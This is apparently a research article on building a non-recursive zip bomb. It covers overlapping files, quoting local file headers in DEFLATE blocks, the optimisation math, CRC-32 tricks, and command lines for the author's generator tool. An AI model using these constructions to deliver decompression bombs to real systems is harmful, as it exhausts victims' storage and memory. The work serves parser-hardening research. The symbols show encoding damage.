A better zip bomb
David Fifield
david@bamsoftware.com
Summary
This article shows how to construct a non-recursive zip bomb that achieves a high compression ratio by overlapping files inside the zip container. "Non-recursive" means that it does not rely on a decompressor's recursively unpacking zip files nested within zip files: it expands fully after a single round of decompression. The output size increases quadratically in the input size, reaching a compression ratio of over28 million(10 MBโ281 TB) at the limits of the zip format. Even greater expansion is possible using 64-bit extensions. The construction uses only the most common compression algorithm, DEFLATE, and is compatible with most zip parsers.
- Source code:
git clone https://www.bamsoftware.com/git/zipbomb.git
zipbomb-20190702.zip- Data and source for figures:
git clone https://www.bamsoftware.com/git/zipbomb-paper.git
non-recursive | recursive | ||||
---|---|---|---|---|---|
zipped size | unzipped size | ratio | unzipped size | ratio | |
Cox quine | 440 | 440 | 1.0 | โ | โ |
Ellingsen quine | 28โฏ809 | 42โฏ569 | 1.5 | โ | โ |
42.zip | *42โฏ374 | 558โฏ432 | 13.2 | 4โฏ507โฏ981โฏ343โฏ026โฏ016 | 106 billion |
this technique | 42โฏ374 | 5โฏ461โฏ307โฏ620 | 129 thousand | 5โฏ461โฏ307โฏ620 | 129 thousand |
this technique | 9โฏ893โฏ525 | 281โฏ395โฏ456โฏ244โฏ934 | 28 million | 281โฏ395โฏ456โฏ244โฏ934 | 28 million |
this technique (Zip64) | 45โฏ876โฏ952 | 4โฏ507โฏ981โฏ427โฏ706โฏ459 | 98 million | 4โฏ507โฏ981โฏ427โฏ706โฏ459 | 98 million |
Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not. The best-known zip bomb, 42.zip, expands to a formidable4.5 PBif all six of its layers are recursively unzipped, but a trifling0.6 MBat the top layer. Zip quines, like those of Ellingsen and Cox, which contain a copy of themselves and thus expand infinitely if recursively unzipped, are likewise perfectly safe to unzip once.
This article shows how to construct a non-recursive zip bomb whose compression ratio surpasses the DEFLATE limit of 1032. It works by overlapping files inside the zip container, in order to reference a "kernel" of highly compressed data in multiple files, without making multiple copies of it. The zip bomb's output size grows quadratically in the input size; i.e., the compression ratio gets better as the bomb gets bigger. The construction depends on features of both zip and DEFLATEโit is not directly portable to other file formats or compression algorithms. It is compatible with most zip parsers, the exceptions being "streaming" parsers that parse in one pass without first consulting the zip file's central directory. We try to balance two conflicting goals:
- Maximize the compression ratio. We define the compression ratio as the the sum of the sizes of all the files contained the in the zip file, divided by the size of the zip file itself. It does not count filenames or other filesystem metadata, only contents.
- Be compatible. Zip is a tricky format and parsers differ, especially around edge cases and optional features. Avoid taking advantage of tricks that only work with certain parsers. We will remark on certain ways to increase the efficiency of the zip bomb that come with some loss of compatibility.
Structure of a zip file
A zip file consists of a central directory which references files.
The central directory is at the end of the zip file. It is a list of central directory headers. Each central directory header contains metadata for a single file, like its filename and CRC-32 checksum, and a backwards pointer to a local file header. A central directory header is 46 bytes long, plus the length of the filename.
A file consists of a local file header followed by compressed file data. The local file header is 30 bytes long, plus the length of the filename. It contains a redundant copy of the metadata from the central directory header, and the compressed and uncompressed sizes of the file data that follows. Zip is a container format, not a compression algorithm. Each file's data is compressed using an algorithm specified in the metadataโusually DEFLATE.
This description of the zip format omits many details that are not needed for understanding the zip bomb. For full information, refer to section 4.3 of APPNOTE.TXT or The structure of a PKZip file by Florian Buchholz, or see the source code.
The first insight: overlapping files
By compressing a long string of repeated bytes, we can produce a kernel of highly compressed data. By itself, the kernel's compression ratio cannot exceed the DEFLATE limit of 1032, so we want a way to reuse the kernel in many files, without making a separate copy of it in each file. We can do it by overlapping files: making many central directory headers point to a single file, whose data is the kernel.
Let's look at an example to see how this construction affects the compression ratio. Suppose the kernel is1000 bytesand decompresses to1 MB. Then the firstMBof output "costs"1078 bytesof input:
- 31 bytesfor a local file header (including a 1-byte filename)
- 47 bytesfor a central directory header (including a 1-byte filename)
- 1000 bytesfor the kernel itself
But every1 MBof output after the first costs only47 bytesโwe don't need another local file header or another copy of the kernel, only an additional central directory header. So while the first reference of the kernel has a compression ratio of 1โฏ000โฏ000 / 1078 โ 928, each additional reference pulls the ratio closer to 1โฏ000โฏ000 / 47 โ 21โฏ277, A bigger kernel raises the ceiling.
The problem with this idea is a lack of compatibility. Because many central directory headers point to a single local file header, the metadataโspecifically the filenameโcannot match for every file. Some parsers balk at that. Info-ZIP UnZip (the standard Unix unzip
program) extracts the files, but with warnings:
$ unzip overlap.zip inflating: A B: mismatching "local" filename (A), continuing with "central" filename version inflating: B ...
And the Python zipfile module throws an exception:
$ python3 -m zipfile -e overlap.zip . Traceback (most recent call last): ... __main__.BadZipFile: File name in directory 'B' and header b'A' differ.
Next we will see how to modify the construction for consistency of filenames, while still retaining most of the advantage of overlapping files.
The second insight: quoting local file headers
We need to separate the local file headers for each file, while still reusing a single kernel. Simply concatenating all the local file headers does not work, because the zip parser will find a local file header where it expects to find the beginning of a DEFLATE stream. But the idea will work, with a minor modification. We'll use a feature of DEFLATE, non-compressed blocks, to "quote" local file headers so that they appear to be part of the same DEFLATE stream that terminates in the kernel. Every local file header (except the first) will be interpreted in two ways: as code (part of the structure of the zip file) and as data (part of the contents of a file).
A DEFLATE stream is a sequence of blocks, where each block may be compressed or non-compressed. Compressed blocks are what we usually think of; for example the kernel is one big compressed block. But there are also non-compressed blocks, which start with a 5-byte header with a length field that means simply, "output the next n bytes verbatim." Decompressing a non-compressed block means only stripping the 5-byte header. Compressed and non-compressed blocks may be intermixed freely in a DEFLATE stream. The output is the concatenation of the results of decompressing all the blocks in order. The "non-compressed" notion only has meaning at the DEFLATE layer; the file data still counts as "compressed" at the zip layer, no matter what kind of blocks are used.
It is easiest to understand this quoted-overlap construction from the inside out, beginning with the last file and working backwards to the first. Start by inserting the kernel, which will form the end of file data for every file. Prepend a local file header LFHN and add a central directory header CDHN that points to it. Set the "compressed size" metadata field in the LFHN and CDHN to the compressed size of the kernel. Now prepend a 5-byte non-compressed block header (colored green in the diagram) whose length field is equal to the size of LFHN. Prepend a second local file header LFHNโ1 and add a central directory header CDHNโ1 that points to it. Set the "compressed size" metadata field in both of the new headers to the compressed size of the kernel plus the size of the non-compressed block header (5 bytes) plus the size of LFHN.
At this point the zip file contains two files, named "Y" and "Z". Let's walk through what a zip parser would see while parsing it. Suppose the compressed size of the kernel is 1000 bytes and the size of LFHN is 31 bytes. We start at CDHNโ1 and follow the pointer to LFHNโ1. The first file's filename is "Y" and the compressed size of its file data is 1036 bytes. Interpreting the next 1036 bytes as a DEFLATE stream, we first encounter the 5-byte header of a non-compressed block that says to copy the next 31 bytes. We write the next 31 bytes, which are LFHN, which we decompress and append to file "Y". Moving on in the DEFLATE stream, we find a compressed block (the kernel), which we decompress to file "Y". Now we have reached the end of the compressed data and are done with file "Y". Proceeding to the next file, we follow the pointer from CDHN to LFHN and find a file named "Z" whose compressed size is 1000 bytes. Interpreting those 1000 bytes as a DEFLATE stream, we immediately encounter a compressed block (the kernel again) and decompress it to the file "Z". Now we have reached the end of the final file and are done. The output file "Z" contains the decompressed kernel; the output file "Y" is the same, but additionally prefixed by the 31 bytes of LFHN.
We complete the construction by repeating the quoting procedure until the zip file contains the desired number of files. Each new file adds a central directory header, a local file header, and a non-compressed block to quote the immediately succeeding local file header. Compressed file data is generally a chain of DEFLATE non-compressed blocks (the quoted local file headers) followed by the compressed kernel. Each byte in the kernel contributes about 1032โฏN to the output size, because each byte is part of all N files. The output files are not all the same size: those that appear earlier in the zip file are larger than those that appear later, because they contain more quoted local file headers. The contents of the output files are not particularly meaningful, but no one said they had to make sense.
This quoted-overlap construction has better compatibility than the full-overlap construction of the previous section, but the compatibility comes at the expense of the compression ratio. There, each added file cost only a central directory header; here, it costs a central directory header, a local file header, and another 5 bytes for the quoting header.
Optimization
Now that we have the basic zip bomb construction, we will try to make it as efficient as possible. We want to answer two questions:
- For a given zip file size, what is the maximum compression ratio?
- What is the maximum compression ratio, given the limits of the zip format?
Kernel compression
It pays to compress the kernel as densely as possible, because every decompressed byte gets magnified by a factor of N. To that end, we use a custom DEFLATE compressor called bulk_deflate, specialized for compressing a string of repeated bytes.
All decent DEFLATE compressors will approach a compression ratio of 1032 when given an infinite stream of repeating bytes, but we care more about specific finite sizes than asymptotics. bulk_deflate compresses more data into the same space than the general-purpose compressors: about 26 kB more than zlib and Info-ZIP, and about 15 kB more than Zopfli, a compressor that trades speed for density.
The price of bulk_deflate's high compression ratio is a lack of generality. bulk_deflate can only compress strings of a single repeated byte, and only those of specific lengths, namely 517 + 258โฏk for integer k โฅ 0. Besides compressing densely, bulk_deflate is fast, doing essentially constant work regardless of the input size, aside from the work of actually writing out the compressed string.
Filenames
For our purposes, filenames are mostly dead weight. While filenames do contribute something to the output size by virtue of being part of quoted local file headers, a byte in a filename does not contribute nearly as much as a byte in the kernel. We want filenames to be as short as possible, while keeping them all distinct, and subject to compatibility considerations.
The first compatibility consideration is character encoding. The zip format specification states that filenames are to be interpreted as CP 437, or UTF-8 if a certain flag bit is set (APPNOTE.TXT Appendix D). But this is a major point of incompatibility across zip parsers, which may interpret filenames as being in some fixed or locale-specific encoding. So for compatibility, we must limit ourselves to characters that have the same encoding in both CP 437 and UTF-8; namely, the 95 printable characters of US-ASCII.
We are further restricted by filesystem naming limitations. Some filesystems are case-insensitive, so "a" and "A" do not count as distinct names. Common filesystems like FAT32 prohibit certain characters like '*' and '?'.
As a safe but not necessarily optimal compromise, our zip bomb will use filenames consisting of characters drawn from a 36-character alphabet that does not rely on case distinctions or use special characters:
Filenames are generated in the obvious way, cycling each position through the possible characters and adding a position on overflow:
"00", "01", "02", โฆ, "0Z",
โฆ,
"Z0", "Z1", "Z2", โฆ, "ZZ",
"000", "001", "002", โฆ
There are 36 filenames of length 1, 362 filenames of length 2, and so on. Four bytes are enough to represent1โฏ727โฏ604distinct filenames.
Given that the N filenames in the zip file are generally not all of the same length, which way should we order them, shortest to longest or longest to shortest? A little reflection shows that it is better to put the longest names last, because those names are the most quoted. Ordering filenames longest last adds over900 MBof output to zblg.zip, compared to organizing them longest first. It is a minor optimization, though, as those900 MBcomprise only0.0003%of the total output size.
Kernel size
The quoted-overlap construction allows us to place a compressed kernel of data, and then cheaply copy it many times. For a given zip file size X, how much space should we devote to storing the kernel, and how much to making copies?
To find the optimum balance, we only have to optimize the single variable N, the number of files in the zip file. Every value of N requires a certain amount of overhead for central directory headers, local file headers, quoting block headers, and filenames. All the remaining space can be taken up by the kernel. Because N has to be an integer, and you can only fit so many files before the kernel size drops to zero, it suffices to test every possible value of N and select the one that yields the most output.
Applying the optimization procedure to X = 42โฏ374, the size of 42.zip, finds a maximum at N = 250. Those 250 files require21โฏ195bytes of overhead, leaving21โฏ179bytes for the kernel. A kernel of that size decompresses to21โฏ841โฏ249bytes (a ratio of1031.3). The 250 copies of the decompressed kernel, plus the little bit extra that comes from the quoted local file headers, produces an overall unzipped output of 5โฏ461โฏ307โฏ620 bytes and a compression ratio of129 thousand.
zipbomb --mode=quoted_overlap --num-files=250 --compressed-size=21179 > zbsm.zip
Optimization produced an almost even split between the space allocated to the kernel and the space allocated to file headers. It is not a coincidence. Let's look at a simplified model of the quoted-overlap construction. In the simplified model, we ignore filenames, as well as the slight increase in output file size due to quoting local file headers. Analysis of the simplified model will show that the optimum split between kernel and file headers is approximately even, and that the output size grows quadratically when allocation is optimal.
Define some constants and variables:
X | zip file size (take as fixed) | |
N | number of files in the zip file (variable to optimize) | |
CDH | = 46 | size of a central directory header (without filename) |
LFH | = 30 | size of a local file header (without filename) |
Q | = 5 | the size of DEFLATE non-compressed block header |
C | โ 1032 | compression ratio of the kernel |
Let H(N) be the amount of header overhead required by N files. Refer to the diagram to understand where this formula comes from.
H(N) | = N โ (CDH + LFH) + (N โ 1) โ Q |
The space remaining for the kernel is X โ H(N). The total unzipped size SX(N) is the size of N copies of the kernel, decompressed at ratio C. (In this simplified model we ignore the minor additional expansion from quoted local file headers.)
SX(N) | = (X โ H(N))โฏCโฏN |
= (X โ (N โ (CDH + LFH) + (N โ 1) โ Q))โฏCโฏN | |
= โ(CDH + LFH + Q)โฏCโฏN2 + (X + Q)โฏCโฏN |
SX(N) is a polynomial in N, so its maximum must be at a place where the derivative SโฒX(N) is zero. Taking the derivative and finding the zero gives us NOPT, the optimal number of files.
SโฒX(NOPT) | = โ2โฏ(CDH + LFH + Q)โฏCโฏNOPT + (X + Q)โฏC |
0 | = โ2โฏ(CDH + LFH + Q)โฏCโฏNOPT + (X + Q)โฏC |
NOPT | = (X + Q) / (CDH + LFH + Q) / 2 |
H(NOPT) gives the optimal amount of space to allocate for file headers. It is independent of CDH, LFH, and C, and is close to Xโฏ/โฏ2.
H(NOPT) | = NOPT โ (CDH + LFH) + (NOPT โ 1) โ Q |
= (X โ Q) / 2 |
SX(NOPT) is the total unzipped size when the allocation is optimal. From this we see that the output size grows quadratically in the input size.
SX(NOPT) | = (X + Q)2โฏC / (CDH + LFH + Q) / 4 |
As we make the zip file larger, eventually we run into the limits of the zip format. A zip file can contain at most 216 โ 1 files, and each file can have an uncompressed size of at most 232 โ 1 bytes. Worse than that, some implementations take the maximum possible values as an indicator of the presence of 64-bit extensions, so our limits are actually 216 โ 2 and 232 โ 2. It happens that the first limit we hit is the one on uncompressed file size. At a zip file size of 8โฏ319โฏ377 bytes, naive optimization would give us a file count of 47โฏ837 and a largest file with the impossible size of 232 + 311 bytes.
Accepting that we cannot increase N nor the size of the kernel without bound, we would like find the maximum compression ratio achievable while remaining within the limits of the zip format. The way to proceed is to make the kernel as large as possible, and have the maximum number of files. Even though we can no longer maintain the roughly even split between kernel and file headers, each added file does increase the compression ratioโjust not as fast as it would if we were able to keep growing the kernel, too. In fact, as we add files we will need to decrease the size of the kernel to make room for the maximum file size that gets slightly larger with each added file.
The plan results in a zip file that contains 216 โ 2 files and a kernel that decompresses to 232 โ 2โฏ178โฏ825 bytes. Files get longer towards the beginning of the zip fileโthe first and largest file decompresses to 232 โ 56 bytes. That is as close as we can get using the coarse output sizes of bulk_deflateโencoding the final 54 bytes would cost more bytes than they are worth. (The zip file as a whole has a compression ratio of 28 million, and the final 54 bytes would gain at most 54 โ 1032 โ (216 โ 2) โ36.5 million bytes, so it only helps if the 54 bytes can be encoded in 1 byteโI could not do it in less than 2.) so unless you can encode the 54 bytes into 1 byte, it only lowers the compression ratio.) The output size of this zip bomb, 281โฏ395โฏ456โฏ244โฏ934 bytes, is 99.97% of the theoretical maximum (232 โ 1) โ (216 โ 1). Any major improvements to the compression ratio can only come from reducing the input size, not increasing the output size.
zipbomb --mode=quoted_overlap --num-files=65534 --max-uncompressed-size=4292788525 > zblg.zip
Efficient CRC-32 computation
Among the metadata in the central directory header and local file header is a CRC-32 checksum of the uncompressed file data. This poses a problem, because directly calculating the CRC-32 of each file requires doing work proportional to the total unzipped size, which is large by design. (It's a zip bomb, after all.) We would prefer to do work that in the worst case is proportional to the zipped size. Two factors work in our advantage: all files share a common suffix (the kernel), and the uncompressed kernel is a string of repeated bytes. We will represent CRC-32 as a matrix productโthis will allow us not only to compute the checksum of the kernel quickly, but also to reuse computation across files. The technique described in this section is a slight extension of the crc32_combine
function in zlib, which Mark Adler explains here.
You can model CRC-32 as a state machine that updates a 32-bit state register for each incoming bit. The basic update operations for a 0 bit and a 1 bit are:
uint32 crc32_update_0(uint32 state) {
// Shift out the least significant bit.
bit b = state & 1;
state = state >> 1;
// If the shifted-out bit was 1, XOR with the CRC-32 constant.
if (b == 1)
state = state ^ 0xedb88320;
return state;
}
uint32 crc32_update_1(uint32 state) {
// Do as for a 0 bit, then XOR with the CRC-32 constant.
return crc32_update_0(state) ^ 0xedb88320;
}
If you think of the state register as a 32-element binary vector, and use XOR for addition and AND for multiplication, then crc32_update_0
is a linear transformation; i.e., it can be represented as multiplication by a 32ร32 binary transformation matrix. To see why, observe that multiplying a matrix by a vector is just summing the columns of the matrix, after multiplying each column by the corresponding element of the vector. The shift operation state >> 1
is just taking each bit i of the state vector and multiplying it by a vector that is 0 everywhere except at bit i โ 1 (numbering the bits from right to left). The conditional final XOR state ^ 0xedb88320
that only happens when bit b
is 1 can instead be represented as first multiplying b
by 0xedb88320 and then XORing it into the state.
Furthermore, crc32_update_1
is just crc32_update_0
plus (XOR) a constant. That makes crc32_update_1
an affine transformation: a matrix multiplication followed by a translation (i.e., vector addition). We can represent both the matrix multiplication and the translation in a single step if we enlarge the dimensions of the transformation matrix to 33ร33 and append an extra element to the state vector that is always 1. (This representation is called homogeneous coordinates.)
0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
